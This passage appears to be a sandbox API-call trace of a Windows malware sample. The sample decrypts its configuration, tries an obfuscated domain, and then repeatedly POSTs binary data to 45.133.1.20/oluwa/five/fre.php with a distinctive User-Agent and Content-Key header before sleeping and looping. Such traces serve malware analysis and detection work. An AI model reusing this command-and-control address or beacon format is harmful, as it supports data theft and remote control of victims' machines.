Flags=0x0, Size=0x20) returned 0x6b3580 [0215.041] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0215.041] GetProcessHeap () returned 0x6a0000 [0215.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0215.045] GetProcessHeap () returned 0x6a0000 [0215.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0215.046] GetProcessHeap () returned 0x6a0000 [0215.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0215.046] GetProcessHeap () returned 0x6a0000 [0215.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0215.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.048] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0215.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.054] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0215.060] GetProcessHeap () returned 0x6a0000 [0215.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0215.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.061] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0215.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.062] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0215.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.063] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0215.063] GetProcessHeap () returned 0x6a0000 [0215.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0215.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.067] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0215.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.068] CryptDestroyKey (hKey=0x6ad020) returned 1 [0215.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.069] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0215.069] GetProcessHeap () returned 0x6a0000 [0215.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0215.069] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.070] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0215.070] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.071] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0215.071] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.072] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0215.072] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.073] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0215.073] GetProcessHeap () returned 0x6a0000 [0215.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0215.073] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0215.073] GetProcessHeap () returned 0x6a0000 [0215.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0215.073] socket (af=2, type=1, protocol=6) returned 0x610 [0215.073] connect (s=0x610, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0215.098] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0215.098] GetProcessHeap () returned 0x6a0000 [0215.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0215.098] GetProcessHeap () returned 0x6a0000 [0215.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d7f08 [0215.099] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0215.099] wvsprintfA (in: param_1=0x6d7f08, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0215.099] GetProcessHeap () returned 0x6a0000 [0215.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0215.100] GetProcessHeap () returned 0x6a0000 [0215.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0215.100] GetProcessHeap () returned 0x6a0000 [0215.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0215.100] GetProcessHeap () returned 0x6a0000 [0215.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d7f08 [0215.101] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0215.102] wvsprintfA (in: param_1=0x6d7f08, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0215.102] GetProcessHeap () returned 0x6a0000 [0215.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0215.102] GetProcessHeap () returned 0x6a0000 [0215.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0215.102] send (s=0x610, buf=0x6b5c98*, len=242, flags=0) returned 242 [0215.103] send (s=0x610, buf=0x6bb998*, len=159, flags=0) returned 159 [0215.103] GetProcessHeap () returned 0x6a0000 [0215.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4f18 [0215.103] recv (in: s=0x610, buf=0x6c4f18, len=4048, flags=0 | out: buf=0x6c4f18*) returned 204 [0215.341] GetProcessHeap () returned 0x6a0000 [0215.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0215.342] GetProcessHeap () returned 0x6a0000 [0215.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0215.342] GetProcessHeap () returned 0x6a0000 [0215.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0215.343] GetProcessHeap () returned 0x6a0000 [0215.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0215.343] closesocket (s=0x610) returned 0 [0215.345] GetProcessHeap () returned 0x6a0000 [0215.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0215.345] GetProcessHeap () returned 0x6a0000 [0215.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0215.345] GetProcessHeap () returned 0x6a0000 [0215.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0215.346] GetProcessHeap () returned 0x6a0000 [0215.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0215.347] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4f18, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x13e0) returned 0x610 [0215.349] Sleep (dwMilliseconds=0xea60) [0215.350] GetProcessHeap () returned 0x6a0000 [0215.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0215.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.351] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0215.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.359] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0215.365] GetProcessHeap () returned 0x6a0000 [0215.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0215.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.366] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0215.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.368] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0215.370] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.371] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0215.371] GetProcessHeap () returned 0x6a0000 [0215.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0215.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.372] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0215.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.373] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0215.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.374] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0215.374] GetProcessHeap () returned 0x6a0000 [0215.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0215.374] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.375] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0215.375] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.376] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0215.376] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.376] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0215.377] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.377] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0215.377] GetProcessHeap () returned 0x6a0000 [0215.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0215.378] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0215.378] GetProcessHeap () returned 0x6a0000 [0215.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0215.378] GetProcessHeap () returned 0x6a0000 [0215.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0215.381] GetProcessHeap () returned 0x6a0000 [0215.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0215.381] GetProcessHeap () returned 0x6a0000 [0215.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0215.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.382] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0215.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.408] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0215.417] GetProcessHeap () returned 0x6a0000 [0215.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0215.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.418] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0215.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.420] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0215.421] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.421] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0215.421] GetProcessHeap () returned 0x6a0000 [0215.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0215.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.423] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0215.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.428] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0215.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.429] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0215.429] GetProcessHeap () returned 0x6a0000 [0215.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0215.430] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.430] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0215.431] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.431] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0215.432] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.432] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0215.433] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.433] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0215.433] GetProcessHeap () returned 0x6a0000 [0215.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0215.433] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0215.433] GetProcessHeap () returned 0x6a0000 [0215.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa80 [0215.433] socket (af=2, type=1, protocol=6) returned 0x614 [0215.434] connect (s=0x614, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0215.459] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0215.459] GetProcessHeap () returned 0x6a0000 [0215.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0215.459] GetProcessHeap () returned 0x6a0000 [0215.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d7f08 [0215.460] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0215.461] wvsprintfA (in: param_1=0x6d7f08, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0215.461] GetProcessHeap () returned 0x6a0000 [0215.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0215.461] GetProcessHeap () returned 0x6a0000 [0215.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0215.462] GetProcessHeap () returned 0x6a0000 [0215.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0215.462] GetProcessHeap () returned 0x6a0000 [0215.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d7f08 [0215.463] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0215.464] wvsprintfA (in: param_1=0x6d7f08, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0215.464] GetProcessHeap () returned 0x6a0000 [0215.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0215.464] GetProcessHeap () returned 0x6a0000 [0215.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0215.464] send (s=0x614, buf=0x6b5c98*, len=242, flags=0) returned 242 [0215.465] send (s=0x614, buf=0x6bb998*, len=159, flags=0) returned 159 [0215.465] GetProcessHeap () returned 0x6a0000 [0215.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4f18 [0215.465] recv (in: s=0x614, buf=0x6c4f18, len=4048, flags=0 | out: buf=0x6c4f18*) returned 204 [0215.532] GetProcessHeap () returned 0x6a0000 [0215.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0215.533] GetProcessHeap () returned 0x6a0000 [0215.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0215.536] GetProcessHeap () returned 0x6a0000 [0215.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0215.536] GetProcessHeap () returned 0x6a0000 [0215.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0215.537] closesocket (s=0x614) returned 0 [0215.537] GetProcessHeap () returned 0x6a0000 [0215.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa80 | out: hHeap=0x6a0000) returned 1 [0215.537] GetProcessHeap () returned 0x6a0000 [0215.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0215.538] GetProcessHeap () returned 0x6a0000 [0215.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0215.538] GetProcessHeap () returned 0x6a0000 [0215.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0215.539] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4f18, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc24) returned 0x614 [0215.541] Sleep (dwMilliseconds=0xea60) [0215.544] GetProcessHeap () returned 0x6a0000 [0215.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0215.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.547] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0215.552] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.553] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0215.564] GetProcessHeap () returned 0x6a0000 [0215.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0215.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.566] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0215.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.569] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0215.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.570] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0215.570] GetProcessHeap () returned 0x6a0000 [0215.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0215.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.572] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0215.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.573] CryptDestroyKey (hKey=0x6ad020) returned 1 [0215.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.575] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0215.575] GetProcessHeap () returned 0x6a0000 [0215.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0215.576] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.576] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0215.579] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.584] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0215.585] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.585] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0215.586] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.586] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0215.586] GetProcessHeap () returned 0x6a0000 [0215.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0215.586] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0215.587] GetProcessHeap () returned 0x6a0000 [0215.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0215.587] GetProcessHeap () returned 0x6a0000 [0215.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0215.587] GetProcessHeap () returned 0x6a0000 [0215.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 